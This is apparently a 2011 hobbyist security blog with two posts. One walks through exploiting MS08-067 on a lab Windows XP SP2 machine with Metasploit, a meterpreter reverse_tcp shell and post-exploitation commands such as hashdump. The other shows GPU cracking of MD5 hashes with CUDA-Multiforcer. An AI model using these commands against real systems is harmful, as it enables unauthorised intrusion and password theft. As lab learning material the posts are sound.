Sunday 15 May 2011

Metasploit xp sp2 exploit

Hi all,

This time I have been playing with metasploit and wow, it's pretty cool. Obviously this is quite well used, known and regularly updated. As it is the first time that I have used it I decided to make a vid and quick tutorial on how to do it.

So, first off, I set up a vulnerable xp sp2 box, the vulnerability being that Microsoft made it, teehee!
Then I used backtrack 4 with metasploit installed to use the ms08_067_netapi exploit.

Firstly update the framework:
cd /pentest/exploits/framework3
svn up

Once this has finished hit cd to get back to root:
nmap -O 192.168.0.1
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.0.127  (This is the victims I.P.)
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST   (I.P. of your pc)
exploit    (this runs the exploit)
If all went well you should have a meterpreter shell open.

I then used some of the commands within the meterpreter to see how good it was!
sysinfo
ipconfig
help
hashdump
screenshot
shell

Video here;
metasploit xpsp2

Cheers.
2neon

Monday 9 May 2011

Cuda-multiforcer

Righty then, 

This looks at how to crack hashes on the computers GPU. The reason for this, is the parallel architecture of the graphics cards makes certain programs so much faster to run. In this case it's perfect for cracking hashes.
CUDA programs have to be specifically written to run on the GPU and you cannot run anything else on there! Also CUDA is nvidia only, ATi has something similar. 

Right onwards...

Cuda-multiforcer isn't on the backtrack 4 iso. It is in the repositories, therefore;

apt-get install cuda-multiforcer
is all that is needed.

When cuda-multiforcer was first run I received an error; 
./CUDA-Multiforcer: error while loading shared libraries: libargtable2.so.0: cannot open shared object file: No such file or directory.

After some googling, the fix was simple, copy the contents of
/pentest/passwords/cuda-multiforcer/lib32
to
/lib

Ok, running the cuda-multiforcer;

cd /pentest/passwords/cuda-multiforcer
./CUDA-Muliforcer -c charsets/charsetlowercasenumeric -f /root/j2neon/hash.txt --min 3 --max 6 -h MD5

Ok, the options;
-c is the character set which is in charsets  folder depending on what you need 
-f is the location of the file containing the hash's
--min minimum character length  
--max maximum character length 
-h hash type 

Video:

The passwords were short but it's still seriously fast!

Until next time.
Cheers 
2neon